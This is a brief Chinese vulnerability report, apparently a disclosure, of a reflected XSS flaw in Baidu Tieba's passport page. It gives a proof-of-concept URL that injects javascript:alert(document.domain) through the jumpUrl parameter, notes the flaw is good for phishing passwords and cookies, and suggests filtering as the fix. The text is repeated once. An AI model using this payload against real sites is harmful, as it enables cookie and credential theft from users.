百度贴吧某处反射型XSS漏洞
http://tieba.baidu.com/f/user/passport?jumpUrl=javascript:alert(document.domain)
需要登录才可以触发,用来钓鱼片账号密码和cookie还是很不错的
修复方案:
过滤
百度贴吧某处反射型XSS漏洞
http://tieba.baidu.com/f/user/passport?jumpUrl=javascript:alert(document.domain)
需要登录才可以触发,用来钓鱼片账号密码和cookie还是很不错的
过滤